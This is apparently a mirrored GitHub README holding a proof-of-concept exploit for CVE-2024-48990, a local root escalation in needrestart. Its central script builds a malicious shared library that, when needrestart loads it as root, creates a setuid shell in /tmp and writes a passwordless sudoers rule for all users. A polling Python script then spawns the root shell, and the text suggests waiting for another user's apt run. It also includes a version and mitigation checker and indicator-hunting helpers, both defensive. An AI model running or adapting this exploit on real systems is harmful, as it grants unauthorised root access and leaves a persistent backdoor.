## https://sploitus.com/exploit?id=2F171AF1-80B7-5C9B-8E2E-5475681D3DB6
# CVE-2024-48990-PoC-Testing
This repository contains a **Proof of Concept (PoC)** to demonstrate a **vulnerability in the `needrestart` program**, which fails to set Python's path correctly, leading to potential privilege escalation. The PoC highlights a potential path for gaining elevated privileges by exploiting this flaw.
<p align="center">
<img src="https://github.com/pentestfunctions/CVE-2024-48990-PoC-Testing/blob/main/images/usecase.gif?raw=true">
</p>
## ⚠️ Vulnerability Overview
The **CVE-2024-48990** vulnerability lies within the `needrestart` package. Specifically, it does not properly set Python's path, which can be exploited to escalate privileges when triggered by certain actions.
This PoC simulates a scenario where a malicious shared library is loaded via Python to manipulate system settings and gain elevated privileges. Use it in a controlled, safe environment for testing purposes only.
To check if you are vulnerable run:
```
needrestart --version | grep -q "3.7" && echo "Definitely vulnerable" || echo "Version is potentially not vulnerable, this simply checks for 3.7"
```
If you want a vulnerable version to test with simply run:
```
sudo apt install needrestart=3.7-3
```
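The one-liner above only recognises the string `3.7`. The following is an added example, not part of the original repository: it parses whatever `needrestart --version` prints, treats anything below 3.8 as affected (3.8 is the upstream release that carries the fix), and also checks whether the `$nrconf{interpscan} = 0;` mitigation from the upstream advisory is present in `needrestart.conf`. The function names and the config path default are my own.

```sh
#!/bin/sh
# Added example (not from the original PoC). Assumptions: the upstream fix is in
# needrestart 3.8, and the documented mitigation is `$nrconf{interpscan} = 0;`
# in /etc/needrestart/needrestart.conf.

# Normalise a version such as "3.7-3" or "3.6.1" to "<major> <minor>".
nr_version_parts() {
    v="${1%%-*}"                  # drop the Debian revision suffix
    major="${v%%.*}"
    rest="${v#*.}"
    [ "$rest" = "$v" ] && rest=0   # no minor component at all
    minor="${rest%%.*}"
    printf '%s %s\n' "${major:-0}" "${minor:-0}"
}

# Exit 0 (true) when the upstream version is older than 3.8.
nr_version_is_vulnerable() {
    set -- $(nr_version_parts "$1")
    major="$1"; minor="$2"
    [ "$major" -lt 3 ] && return 0
    [ "$major" -eq 3 ] && [ "$minor" -lt 8 ] && return 0
    return 1
}

# Exit 0 when the config file disables interpreter scanning.
# Comment lines are ignored; whitespace around the assignment is tolerated.
nr_interpscan_disabled() {
    conf="$1"
    [ -r "$conf" ] || return 1
    grep -Ev '^[[:space:]]*#' "$conf" \
        | grep -Eq '^[[:space:]]*\$nrconf\{interpscan\}[[:space:]]*=[[:space:]]*0[[:space:]]*;'
}

# Verdict for the local host: exit 0 = exposed, 1 = not exposed (or not installed).
nr_host_exposed() {
    conf="${1:-/etc/needrestart/needrestart.conf}"
    ver="$(needrestart --version 2>/dev/null \
           | grep -Eo '[0-9]+(\.[0-9]+)+(-[0-9]+)?' | head -n1)"
    [ -n "$ver" ] || return 1                 # needrestart not installed
    nr_version_is_vulnerable "$ver" || return 1
    nr_interpscan_disabled "$conf" && return 1
    return 0
}

nr_host_exposed && echo "needrestart: affected version, mitigation not set" \
               || echo "needrestart: not exposed by version/config check"
```

`nr_host_exposed` only reasons about the upstream version string. Distributions backport fixes without bumping that number, so treat the package changelog (`dpkg -l needrestart` plus the distro advisory) as authoritative when the version check says "affected".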
---
## ⚡ How to Trigger the Vulnerability
To trigger the vulnerability, execute the following while you have the listener script running:
```bash
sudo apt remove ntp; sudo apt install ntp
```
This command reinstalls a package (`ntp` in this case), which causes `needrestart` to run and the issue to be triggered. Ideally, though, you would wait for another user on the system to trigger `needrestart` themselves, for example through `sudo apt update`.
---
## 🚨 Steps to Reproduce
Run the following script to set up the PoC and trigger the vulnerability. You can paste the whole script as-is into your terminal and then either wait or trigger it manually with `ntp` as shown above. It also adds a passwordless `sudoers` rule for the binary for all users for showcasing; realistically you could just grant it to your own user, but I wanted to show both:
```bash
#!/bin/bash
set -e
cd /tmp
mkdir -p malicious/importlib
# Create and compile the malicious library
cat << 'EOF' > /tmp/malicious/lib.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
static void a() __attribute__((constructor));
void a() {
    if (geteuid() == 0) { // Only execute if we're running with root privileges
        setuid(0);
        setgid(0);
        const char *shell = "cp /bin/sh /tmp/poc; "
                            "chmod u+s /tmp/poc; "
                            "grep -qxF 'ALL ALL=NOPASSWD: /tmp/poc' /etc/sudoers || "
                            "echo 'ALL ALL=NOPASSWD: /tmp/poc' | tee -a /etc/sudoers > /dev/null &";
        system(shell);
    }
}
EOF
gcc -shared -fPIC -o "/tmp/malicious/importlib/__init__.so" /tmp/malicious/lib.c
# Minimal Python script to trigger import
cat << 'EOF' > /tmp/malicious/e.py
import time
while True:
    try:
        import importlib
    except:
        pass
    if __import__("os").path.exists("/tmp/poc"):
        print("Got shell!, delete traces in /tmp/poc, /tmp/malicious")
        __import__("os").system("sudo /tmp/poc -p")
        break
    time.sleep(1)
EOF
cd /tmp/malicious; clear; echo -e "\n\nWaiting for needrestart execution...\nEnsure you remove yourself from sudoers on the poc file after\nsudo sed -i '/ALL ALL=NOPASSWD: \/tmp\/poc/d' /etc/sudoers\nAs well as remove excess files created:\nrm -rf /tmp/malicious /tmp/poc"; PYTHONPATH="$PWD" python3 e.py 2>/dev/null
```
## 🔥 Cleanup Script
If you'd like to clean up testing files and remove yourself from `sudoers`, you can run the following from an elevated prompt:
```bash
sudo sed -i '/ALL ALL=NOPASSWD: \/tmp\/poc/d' /etc/sudoers
rm -rf /tmp/malicious /tmp/poc
```
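From the defender's side, the cleanup list above doubles as an indicator list: a `NOPASSWD` sudoers rule pointing into a scratch directory, a setuid file under `/tmp`, and a compiled `__init__.so` sitting in a package directory on a user-controlled `PYTHONPATH`. The following triage helpers are an added example, not part of the original repository; the scratch-directory list, the sample `sudoers` content and the temporary directory used for testing are constructed for the example.

```sh
#!/bin/sh
# Added example (not from the original PoC): look for the traces the PoC above
# leaves behind. The scratch-directory list below is an assumption; extend it to
# match your mounts.

SCRATCH_DIRS='/tmp|/var/tmp|/dev/shm'

# Print non-comment sudoers lines that grant NOPASSWD execution of a command
# located in a world-writable scratch directory. Exit 0 if any were found.
sudoers_find_scratch_nopasswd() {
    grep -Ev '^[[:space:]]*#' "$1" \
        | grep -E "NOPASSWD:[[:space:]]*(${SCRATCH_DIRS})/"
}

# Print setuid regular files under a directory (depth-limited so it stays cheap
# on a busy /tmp). Exit 0 if any were found.
find_setuid_in() {
    out="$(find "$1" -maxdepth 2 -type f -perm -4000 2>/dev/null)"
    [ -n "$out" ] && printf '%s\n' "$out"
}

# Print shared objects under a directory; a package directory in /tmp holding
# an __init__.so is the shape this PoC uses. Exit 0 if any were found.
find_shared_objects_in() {
    out="$(find "$1" -maxdepth 3 -type f -name '*.so' 2>/dev/null)"
    [ -n "$out" ] && printf '%s\n' "$out"
}

# Run all three checks. Arguments: sudoers path and scratch directory
# (defaults: /etc/sudoers and /tmp). Exit 0 if anything suspicious was found.
triage_host() {
    sudoers="${1:-/etc/sudoers}"
    scratch="${2:-/tmp}"
    found=1
    if hits="$(sudoers_find_scratch_nopasswd "$sudoers" 2>/dev/null)"; then
        printf 'sudoers NOPASSWD rule into a scratch dir:\n%s\n' "$hits"; found=0
    fi
    if hits="$(find_setuid_in "$scratch")"; then
        printf 'setuid file(s) under %s:\n%s\n' "$scratch" "$hits"; found=0
    fi
    if hits="$(find_shared_objects_in "$scratch")"; then
        printf 'shared object(s) under %s:\n%s\n' "$scratch" "$hits"; found=0
    fi
    return "$found"
}

# Reading /etc/sudoers needs root; run as: sudo sh triage.sh
triage_host && echo "review the findings above" || echo "no PoC artefacts found"
```

The sudoers check is deliberately broader than the exact `ALL ALL=NOPASSWD: /tmp/poc` line: any passwordless rule whose command lives in a world-writable directory is a finding in its own right, whether or not it came from this PoC.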
---
## 🛠️ Requirements
- **Linux-based system** (Ubuntu/Debian recommended)
- **`needrestart` package** installed (or removed and reinstalled to trigger)
- **Python 3.x** installed (for running the Python script)
---
## 🚨 Warning
This PoC is for **testing purposes only** and should not be used in a production environment. Exploiting this vulnerability in unauthorized environments may be illegal. Always obtain explicit permission before conducting any security testing.
---
## 🔗 Resources
- GitHub Repository: [CVE-2024-48990-PoC](https://github.com/makuga01/CVE-2024-48990-PoC/)
- CVE Details: [CVE-2024-48990](https://vulners.com/cve/CVE-2024-48990)
---
Happy testing! 🧪🚀